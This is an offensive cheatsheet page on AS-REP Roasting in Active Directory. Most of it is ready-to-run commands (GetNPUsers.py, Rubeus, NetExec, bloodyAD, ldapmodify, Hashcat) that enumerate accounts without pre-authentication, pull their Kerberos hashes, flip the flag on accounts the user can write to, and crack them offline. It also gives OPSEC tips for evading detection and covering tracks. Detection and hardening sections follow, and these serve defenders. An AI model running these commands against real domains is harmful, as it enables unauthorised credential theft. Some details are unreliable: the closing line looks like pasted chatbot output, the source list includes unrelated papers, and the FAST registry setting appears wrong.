daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-3-as-rep-roasting.md (22153B)


      1 ---
      2 title: "Attack #3 β€” AS-REP Roasting"
      3 description: "AS-REP Roasting targets Active Directory accounts that have the \"Do not require Kerberos preauthentication\" flag set (DONT_REQ_PREAUTH). Under normal…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "hashing"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #3 β€” AS-REP Roasting.md"
     11 ---
     12 # πŸ”΄ Attack #3 β€” AS-REP Roasting
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 AS-REP Roasting targets Active Directory accounts that have the **"Do not require Kerberos preauthentication"** flag set (`DONT_REQ_PREAUTH`). Under normal Kerberos operation, a user must prove knowledge of their password by encrypting a timestamp and sending it in an AS-REQ β€” the KDC verifies this before issuing a TGT. When pre-authentication is disabled, however, the KDC skips that verification entirely and **immediately returns an AS-REP containing a blob encrypted with the user's password hash** β€” with zero proof of identity from the requester.
     19 
     20 The attacker simply sends an unauthenticated AS-REQ for the target username, receives the AS-REP, rips out the encrypted section (`$krb5asrep$23$...`), and cracks it offline. The critical distinction from Kerberoasting is that **no valid credentials are required at all** to request the hash β€” making this a viable first-foothold attack rather than just a post-compromise technique.
     21 
     22 > ⚠️ **Windows Server 2022+ Behaviour:** Server 2022 and newer domains enforce stricter Kerberos policies by default. DONT_REQ_PREAUTH on user accounts is now rare in well-maintained domains, but service accounts still frequently have pre-auth disabled. Also, if AES-256 encryption is enforced (not RC4), the hash difficulty increases significantly β€” but most environments still default to RC4 for compatibility. GetNPUsers.py will request both etype 23 (RC4) and etype 18 (AES-256); always prioritize cracking the RC4 hash if available.
     23 
     24 **Chains with:** Attack #1 (user enumeration with Kerbrute feeds usernames directly into AS-REP), Attack #6 (ACL abuse to set DONT_REQ_PREAUTH on target accounts)
     25 
     26 ### The Full Attack Flow
     27 
     28 ```
     29 1. Enumerate domain for accounts with DONT_REQ_PREAUTH flag set
     30    (via LDAP query β€” attribute: userAccountControl bit 0x400000)
     31 2. Send unauthenticated AS-REQ to the KDC (port 88) for each vulnerable account
     32 3. KDC responds with AS-REP β€” no credential verification performed
     33 4. Extract encrypted blob from AS-REP ($krb5asrep$23$...)
     34 5. Crack offline with Hashcat (mode 18200) or John the Ripper
     35 6. Recover plaintext password β†’ authenticate as target account
     36 ```
     37 
     38 ### Kerberoasting vs AS-REP Roasting β€” Key Differences
     39 
     40 | Property | Kerberoasting | AS-REP Roasting |
     41 |---|---|---|
     42 | **Credentials needed** | Any valid domain user | **None required** (can be unauthenticated) |
     43 | **What you request** | TGS ticket (service ticket) | AS-REP (TGT response) |
     44 | **Target accounts** | Accounts with SPNs set | Accounts with pre-auth disabled |
     45 | **Hash format** | `$krb5tgs$23$...` | `$krb5asrep$23$...` |
     46 | **Hashcat mode** | 13100 (RC4) | **18200** |
     47 | **Prevalence** | Very common | Less common but devastating |
     48 
     49 ***
     50 
     51 ## βš™οΈ Prerequisites
     52 
     53 | Requirement | Detail |
     54 |---|---|
     55 | **Network access to DC** | Port 88 (Kerberos) reachable β€” that's it for the unauthenticated variant |
     56 | **Valid domain user (optional)** | Only needed for LDAP enumeration of vulnerable accounts |
     57 | **Target accounts** | Accounts with `DONT_REQ_PREAUTH` flag set in `userAccountControl` |
     58 | **Offline cracking rig** | GPU-accelerated Hashcat preferred; hash is RC4 by default (fast to crack) |
     59 
     60 ***
     61 
     62 ## πŸ› οΈ Tools
     63 
     64 | Tool | Platform | Notes |
     65 |---|---|---|
     66 | **Impacket β€” GetNPUsers.py** | Linux | Primary Linux tool; supports unauthenticated + authenticated modes |
     67 | **Rubeus** | Windows | Best Windows tool; auto-discovers and roasts all vulnerable accounts |
     68 | **Kerbrute** | Linux | Can perform AS-REP roasting during user enumeration pass |
     69 | **PowerView β€” Get-DomainUser** | Windows | Enumerate `DONT_REQ_PREAUTH` accounts via LDAP |
     70 | **BloodHound** | Both | Flags AS-REP roastable accounts; shows attack path |
     71 | **NetExec / CrackMapExec** | Linux | LDAP module can enumerate and dump AS-REP hashes |
     72 | **Hashcat** | Linux/Windows | Mode `18200` for AS-REP hashes |
     73 | **John the Ripper** | Linux | `krb5asrep` format; CPU-based alternative |
     74 | **bloodyAD** | Linux | LDAP framework; can set DONT_REQ_PREAUTH on accounts you control |
     75 
     76 ***
     77 
     78 ## πŸ’» Full Commands
     79 
     80 ### πŸ”΅ Step 0 β€” Enumerate Accounts with Pre-Auth Disabled
     81 
     82 ```bash
     83 # Linux β€” LDAP query (unauthenticated or authenticated)
     84 ldapsearch -x -H ldap://10.10.10.10 -D "corp\low_user" -w 'Password1' \
     85   -b "DC=corp,DC=local" \
     86   "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
     87   sAMAccountName
     88 ```
     89 
     90 ```powershell
     91 # Windows β€” PowerShell with AD module
     92 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth | \
     93   Select-Object SamAccountName, DistinguishedName
     94 
     95 # Windows β€” PowerView
     96 Import-Module .\PowerView.ps1
     97 Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName, Description, MemberOf
     98 
     99 # Windows β€” LDAP query with ADSearch
    100 ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
    101   --attributes cn,distinguishedname,samaccountname
    102 ```
    103 
    104 ***
    105 
    106 ### πŸ”΄ Impacket β€” GetNPUsers.py (Linux β€” Primary Tool)
    107 
    108 ```bash
    109 # Unauthenticated β€” brute-force userlist (no creds needed, just usernames)
    110 GetNPUsers.py corp.local/ -no-pass -usersfile valid_users.txt -dc-ip 10.10.10.10
    111 
    112 # Unauthenticated β€” single target account
    113 GetNPUsers.py corp.local/svc_backup -no-pass -dc-ip 10.10.10.10
    114 
    115 # Authenticated β€” auto-enumerate ALL vulnerable accounts from domain (best method)
    116 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request
    117 
    118 # Authenticated β€” dump all hashes to file
    119 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request \
    120   -outputfile asrep_hashes.txt -format hashcat
    121 
    122 # Authenticated β€” John format output
    123 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request \
    124   -outputfile asrep_hashes.txt -format john
    125 
    126 # Using NTLM hash (no plaintext password needed)
    127 GetNPUsers.py corp.local/low_user -hashes :a87f3a337d73085c45f9416be5787d86 \
    128   -dc-ip 10.10.10.10 -request
    129 ```
    130 
    131 > **Hash format you'll see:** `$krb5asrep$23$victim@corp.local:1a2b3c4d...` β†’ `23` = RC4 encryption β€” fast to crack with Hashcat mode 18200.
    132 
    133 ***
    134 
    135 ### πŸ”΄ Rubeus β€” Windows (Most Powerful)
    136 
    137 ```powershell
    138 # Roast ALL accounts with pre-auth disabled (auto-discovery)
    139 .\Rubeus.exe asreproast
    140 
    141 # Output in Hashcat format to file
    142 .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
    143 
    144 # Target a single specific user
    145 .\Rubeus.exe asreproast /user:svc_backup /format:hashcat /outfile:svc_backup.hash
    146 
    147 # No-wrap output (prevents base64 line-break corruption)
    148 .\Rubeus.exe asreproast /format:hashcat /nowrap
    149 
    150 # From an existing TGT (avoids new auth event)
    151 .\Rubeus.exe asreproast /ticket:<base64_TGT> /format:hashcat
    152 
    153 # Enumerate only β€” list vulnerable accounts without requesting hashes
    154 .\Rubeus.exe asreproast /stats
    155 ```
    156 
    157 ***
    158 
    159 ### πŸ”΄ Kerbrute β€” Linux (Unauthenticated, Combining Enum + Roast)
    160 
    161 ```bash
    162 # Standard user enumeration (will flag pre-auth disabled accounts automatically)
    163 kerbrute userenum -d corp.local --dc 10.10.10.10 /usr/share/wordlists/users.txt
    164 
    165 # Note: Kerbrute flags accounts responding without pre-auth during enumeration
    166 # Use GetNPUsers.py to request the actual hashes from those accounts
    167 ```
    168 
    169 ***
    170 
    171 ### πŸ”΄ NetExec β€” Linux (Quick Authenticated Sweep)
    172 
    173 ```bash
    174 # Enumerate and dump AS-REP hashes via LDAP
    175 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --asreproast asrep_hashes.txt
    176 
    177 # Using Kerberos ticket (ccache)
    178 export KRB5CCNAME=/tmp/low_user.ccache
    179 nxc ldap 10.10.10.10 --use-kcache --asreproast asrep_hashes.txt
    180 ```
    181 
    182 ***
    183 
    184 ### πŸ”΄ PowerView β€” Manual Enumeration + Roasting (Windows)
    185 
    186 ```powershell
    187 Import-Module .\PowerView.ps1
    188 
    189 # Enumerate all DONT_REQ_PREAUTH accounts
    190 Get-DomainUser -PreauthNotRequired -Properties SamAccountName, Description, MemberOf
    191 
    192 # Check if a specific user has pre-auth disabled
    193 Get-DomainUser -Identity svc_backup -Properties DoesNotRequirePreAuth
    194 
    195 # Enable DONT_REQ_PREAUTH on an account you control (if you have GenericWrite)
    196 # This lets you roast accounts you've targeted via ACL abuse
    197 Set-DomainObject -Identity target_user -XOR @{userAccountControl=4194304} -Verbose
    198 ```
    199 
    200 > ⚠️ **Advanced Technique:** If you have `GenericWrite` over a user account (from ACL abuse), you can **set** `DONT_REQ_PREAUTH` on that account yourself, making it AS-REP roastable on demand, then crack the hash. This bridges ACL abuse (Category 3) directly into credential theft.
    201 
    202 ***
    203 
    204 ### πŸ”΄ bloodyAD β€” Set DONT_REQ_PREAUTH via LDAP (Linux)
    205 
    206 ```bash
    207 # Set DONT_REQ_PREAUTH on a user you have write access to
    208 bloodyAD --host 10.10.10.10 -u 'corp.local\low_user' -p 'Password1' \
    209   set object target_user userAccountControl 4194304
    210 
    211 # Unset DONT_REQ_PREAUTH to cover tracks (change 4194304 back to 512)
    212 bloodyAD --host 10.10.10.10 -u 'corp.local\low_user' -p 'Password1' \
    213   set object target_user userAccountControl 512
    214 
    215 # Note: userAccountControl values β€” 512 = normal user, +4194304 = DONT_REQ_PREAUTH
    216 ```
    217 
    218 ***
    219 
    220 ### πŸ”΄ ldapmodify β€” LDAP Modify (Linux Alternative)
    221 
    222 ```bash
    223 # Create LDIF file to set DONT_REQ_PREAUTH
    224 cat > modify.ldif << 'EOF'
    225 dn: CN=target_user,CN=Users,DC=corp,DC=local
    226 changetype: modify
    227 replace: userAccountControl
    228 userAccountControl: 4194304
    229 EOF
    230 
    231 # Apply the modification (requires LDAP write access)
    232 ldapmodify -x -D "CN=low_user,CN=Users,DC=corp,DC=local" -w 'Password1' \
    233   -H ldap://10.10.10.10 -f modify.ldif
    234 ```
    235 
    236 ***
    237 
    238 ### πŸ”΄ Offline Cracking β€” Hashcat
    239 
    240 ```bash
    241 # AS-REP hash cracking β€” mode 18200 (RC4-HMAC / krb5asrep)
    242 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
    243 
    244 # With best64 rules (strong coverage for corporate passwords)
    245 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
    246   -r /usr/share/hashcat/rules/best64.rule
    247 
    248 # With d3ad0ne rules (aggressive, higher coverage)
    249 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
    250   -r /usr/share/hashcat/rules/d3ad0ne.rule
    251 
    252 # Combination attack β€” wordlist + mask (corporate format: Word+Year+Symbol)
    253 hashcat -m 18200 asrep_hashes.txt -a 6 /usr/share/wordlists/rockyou.txt '?d?d?d?s'
    254 
    255 # Brute-force mask for short passwords (8 chars, mixed case + digit + symbol)
    256 hashcat -m 18200 asrep_hashes.txt -a 3 ?u?l?l?l?l?d?d?s
    257 
    258 # John the Ripper alternative
    259 john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
    260 john --format=krb5asrep asrep_hashes.txt --show
    261 ```
    262 
    263 ***
    264 
    265 ## 🧩 Troubleshooting
    266 
    267 | Error | Cause | Fix |
    268 |---|---|---|
    269 | **`KDC_ERR_PREAUTH_REQUIRED`** | Target account actually requires pre-auth (flag check failed). | Re-verify the account's `userAccountControl` value β€” may have been set to require pre-auth since enumeration. Try a different account from your list. |
    270 | **`KDC_ERR_CLIENT_NAME_MISMATCH`** | Username doesn't exist in domain or typo in domain name. | Verify username spelling. Check domain FQDN matches domain controller. Run Kerbrute to confirm user exists. |
    271 | **`Socket timeout / No response from KDC`** | Port 88 filtered or KDC unreachable. | Verify network connectivity to DC on port 88 (`nc -zv 10.10.10.10 88`). Check firewall rules. Confirm DC IP is correct. |
    272 | **Hash cracking fails (no plaintext found)** | Password not in wordlist or incorrect ruleset. | Try larger wordlists (SecLists, CrunchBase). Add context-specific rules (company name, keywords). Use mask attacks with common patterns (?d?d?d, ?s?s). |
    273 | **`Traceback: imaplib module not found`** or similar Python errors | Missing dependencies in Impacket installation. | Reinstall Impacket: `pip install impacket --upgrade`. Ensure you're using Python 3.9+ (`python3 --version`). |
    274 | **NTLM hash cracking starts but is very slow** | Wordlist is too large or no GPU acceleration. | Use Hashcat with GPU: `hashcat -m 18200 -d 1` (device 1 = GPU). Reduce wordlist size or use rules instead of full wordlist. |
    275 | **`Rubeus reports "0 accounts to roast"`** | No accounts found with DONT_REQ_PREAUTH in domain. | The domain may enforce pre-auth strictly. Check service accounts specifically β€” they are more likely to be misconfigured. Verify your user has domain recon permissions. |
    276 | **`GetNPUsers.py returns blank hashes (empty encryption data)`** | Account exists but has no password set (disabled account or computer account). | Filter out disabled accounts and computer accounts from enumeration (`objectClass=user` and NOT `(objectClass=computer)`). Focus on active user accounts only. |
    277 
    278 ***
    279 
    280 ## 🎯 OPSEC Tips
    281 
    282 ### OpSec Ranking (Stealthiest to Loudest)
    283 
    284 1. **Unauthenticated AS-REP per-username** (stealthiest) β€” single 4768 event per user, easily lost in noise
    285 2. **GetNPUsers.py authenticated (with valid account)** β€” blends with normal LDAP traffic
    286 3. **Rubeus on domain-joined machine** β€” local execution, minimal network footprint if run in memory
    287 4. **PowerView enumeration from workstation** β€” moderate LDAP activity, risk if SOC monitors bulk LDAP queries
    288 5. **NetExec subnet spray** (loudest) β€” multiple 4768 events across many hosts in quick succession, clear detection pattern
    289 
    290 ### Modern Defence Impact
    291 
    292 - **Kerberos Armoring (FAST)** β€” when enabled, forces pre-auth even on DONT_REQ_PREAUTH accounts. Modern domains with Kerberos hardening render this attack impossible.
    293 - **Event 4768 alerting** β€” if SOC alerts on `PreAuthType: 0`, each target is immediately detected. Use light enumeration; avoid spraying 20+ accounts in one session.
    294 - **Sysmon + SIEM** β€” credential dumping (Mimikatz) on the same box where you enumerate is risky. Separate enumeration from cracking phases geographically.
    295 
    296 ### Opsec Best Practices
    297 
    298 - **No credentials = less footprint** β€” the unauthenticated variant leaves only a Kerberos AS-REQ event, not an LDAP bind
    299 - **Use `/nowrap` in Rubeus** β€” avoids hash corruption from line wrapping in terminal logs
    300 - **Target high-value accounts first** β€” look for admin, svc_, backup, or service in the username
    301 - **AS-REP roast BEFORE password spraying** β€” it's entirely passive and leaves minimal artefacts
    302 - **Combine with GenericWrite abuse** β€” if you have write access to a user object, set `DONT_REQ_PREAUTH` temporarily, roast it, then unset the flag to cover tracks
    303 - **Avoid mass enumeration over LDAP** β€” the unauthenticated AS-REQ method per-username is stealthier than a bulk LDAP query listing all pre-auth disabled accounts
    304 
    305 ***
    306 
    307 ## πŸ›‘οΈ Detection β€” Event IDs
    308 
    309 | Event ID | Source | What to Look For |
    310 |---|---|---|
    311 | **4768** | Security Log | AS-REQ sent β€” **`PreAuthType = 0`** (no pre-auth) is the smoking gun |
    312 | **4768** | Security Log | Multiple 4768 events from a **single IP** for **different usernames** in a short window |
    313 | **4625** | Security Log | Failed logon shortly after β€” attacker testing cracked credentials |
    314 | **4723 / 4724** | Security Log | Password change on roasted account β€” attacker using recovered credentials |
    315 | **LDAP query logs** | DC Diagnostic | Bulk query for `userAccountControl` with bit `4194304` set |
    316 
    317 **Primary detection signature:** Event 4768 with `PreAuthType: 0` is the clearest indicator. In a well-configured domain, this should essentially never appear during normal operations. A single occurrence warrants investigation; multiple in quick succession from one source IP is near-certain AS-REP Roasting in progress.
    318 
    319 ### Additional Sysmon Event IDs
    320 
    321 | Event ID | Detection |
    322 |---|---|
    323 | **Sysmon 3** | Network connection to port 88 (Kerberos) from unusual process (GetNPUsers, Rubeus wrapper) |
    324 | **Sysmon 22** | DNS query for `_kerberos._tcp.dc._msdcs.corp.local` β€” DC discovery before roasting |
    325 
    326 ### Sigma Rule References
    327 
    328 - **Sigma rule:** `detection_asreproast_multiple_users` β€” flags multiple AS-REQ without pre-auth from same source IP
    329 - **Sigma rule:** `dns_kerberos_discovery` β€” detects SRV record queries for Kerberos before enumeration
    330 - Link: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asreproast.yml
    331 
    332 ### EDR Detections
    333 
    334 - **Microsoft Defender for Identity:** AS-REP Roasting detection (suspicious Kerberos activity) β€” alerts when GetNPUsers or Rubeus detected
    335 - **CrowdStrike Falcon:** Detects Rubeus execution via behavioral analysis (keyword matching in command line)
    336 - **Elastic Security:** Hunt rule `credential_access_asreproast_kerberos` β€” monitors for unauthenticated Kerberos requests
    337 - **Sysmon + SIEM correlations:** LSASS access + Kerberos port 88 activity in sequence = credential theft chain
    338 
    339 ### Hardening Commands
    340 
    341 ```powershell
    342 # Enable Kerberos Armoring (FAST) β€” forces pre-auth even when disabled
    343 # (Domain-wide GPO setting, Server 2012 R2+ required)
    344 Set-GPRegistryValue -Name "Default Domain Policy" \
    345   -Key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" \
    346   -ValueName "ForceStartupDCQuery" -Type DWord -Value 1
    347 
    348 # Disable DONT_REQ_PREAUTH on all user accounts (remediation)
    349 # Find all accounts with pre-auth disabled:
    350 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object {
    351   Set-ADUser -Identity $_ -DoesNotRequirePreAuth $false
    352 }
    353 
    354 # Enable pre-auth requirement via Group Policy
    355 # (GPO path: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options)
    356 # Setting: "Network security: Force Kerberos Pre-Authentication" = Enabled
    357 
    358 # Monitor for suspicious LDAP queries on DC (Event Log)
    359 Get-WinEvent -FilterHashtable @{
    360   LogName = 'Directory Service'
    361   ID = 4662
    362 } -MaxEvents 100 | Where-Object { $_.Properties[6] -match "4194304" }
    363 ```
    364 
    365 ***
    366 
    367 ## πŸ—ΊοΈ MITRE ATT&CK
    368 
    369 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources |
    370 |---|---|---|---|---|---|
    371 | Credential Access | T1558 | **004** (AS-REP) | APT1, APT28, APT29, Wizard Spider | Windows | Authentication logs (4768), Process creation (Sysmon 1), Network traffic (Kerberos port 88) |
    372 
    373 **T1558.004 β€” Steal or Forge Kerberos Tickets: AS-REP Roasting** β€” Specifically targets the AS-REP response from KDC when pre-authentication is disabled. Leads to offline password cracking without needing valid credentials.
    374 
    375 ***
    376 
    377 ## πŸ”— Attack Chain Context
    378 
    379 ```
    380 [AS-REP Roasting] ──→ Plaintext Password Recovered (no prior creds needed)
    381          β”‚
    382          β”œβ”€β”€β†’ πŸ”‘ First foothold β€” use recovered creds to authenticate to domain
    383          β”œβ”€β”€β†’ πŸ” BloodHound enumeration with recovered account
    384          β”œβ”€β”€β†’ 🎫 Kerberoasting (pivot to SPN accounts from new foothold)
    385          β”œβ”€β”€β†’ πŸ”“ Access shares, emails, web apps with service account creds
    386          β”œβ”€β”€β†’ πŸ“ GenericWrite β†’ SET DONT_REQ_PREAUTH on other accounts
    387          └──→ 🎯 If roasted account is in high-priv group β†’ direct escalation path
    388 ```
    389 
    390 **What makes this dangerous as an initial attack:** Unlike Kerberoasting, AS-REP Roasting requires **zero credentials to pull hashes** β€” just a username list and network access to port 88. Combined with Kerbrute user enumeration (Attack #1 recon phase), an attacker can go from **zero knowledge β†’ valid domain credentials** with no lockout risk whatsoever, as each account is only queried once.
    391 
    392 ***
    393 
    394 > βœ… **Attack #3 β€” AS-REP Roasting complete.** Tell me to move on when you're ready for **Attack #4 β€” Pass-the-Hash (PtH)**.
    395 
    396 Sources
    397  AS-REP Roasting Attack - How It Works and Defense Strategies https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/as-rep-roasting/
    398  AS-REP Roasting Attack Explained - MITRE ATT&CK T1558.004 https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004
    399  AS-REP Roasting - Penetration Testing Lab https://pentestlab.blog/2024/02/20/as-rep-roasting/
    400  What is AS-REP Roasting? | Semperis Identity Attack Catalog https://www.semperis.com/blog/as-rep-roasting-explained/
    401  AD Recon – AS-REP Roasting Attacks - Active Directory Attack https://juggernaut-sec.com/as-rep-roasting/
    402  The Silent Threat in Active Directory: How AS-REP Roasting Steals ... https://www.trellix.com/blogs/research/the-silent-threat-in-active-directory/
    403  AS-REP roasting detection https://www.hackthebox.com/blog/as-rep-roasting-detection
    404  Zipper Stack: Shadow Stacks Without Shadow https://arxiv.org/pdf/1902.00888.pdf
    405  Oreo: Protecting ASLR Against Microarchitectural Attacks (Extended Version) http://arxiv.org/pdf/2412.07135.pdf
    406  Security Mitigations for Return-Oriented Programming Attacks https://arxiv.org/pdf/1008.4099.pdf
    407  Attacking Recommender Systems with Augmented User Profiles https://arxiv.org/pdf/2005.08164.pdf
    408  Data-Free Hard-Label Robustness Stealing Attack https://arxiv.org/pdf/2312.05924.pdf
    409  ROPNN: Detection of ROP Payloads Using Deep Neural Networks https://arxiv.org/pdf/1807.11110.pdf
    410  Adversarial Attacks on Both Face Recognition and Face Anti-spoofing Models https://arxiv.org/html/2405.16940v1
    411  VANET Routing Replay Attack Detection Research Based on SVM https://www.matec-conferences.org/articles/matecconf/pdf/2016/26/matecconf_mmme2016_05020.pdf
    412  What is AS-REP Roasting? https://jumpcloud.com/it-index/what-is-as-rep-roasting
    413  AS-REP Roasting Attack Explained | Real-Life Active Directory Exploit ... https://www.youtube.com/watch?v=zl0v5lYSNlQ
    414  InternalAllTheThings/docs/active-directory/ad-roasting-asrep.md at main Β· swisskyrepo/InternalAllTheThings https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/active-directory/ad-roasting-asrep.md
    415  AS-REP Roasting: Exploiting Kerberos for Password Hashes https://redbotsecurity.com/as-rep-roasting/
    416  Cracking Active Directory Passwords with AS-REP Roasting https://netwrix.com/en/resources/blog/cracking_ad_password_with_as_rep_roasting/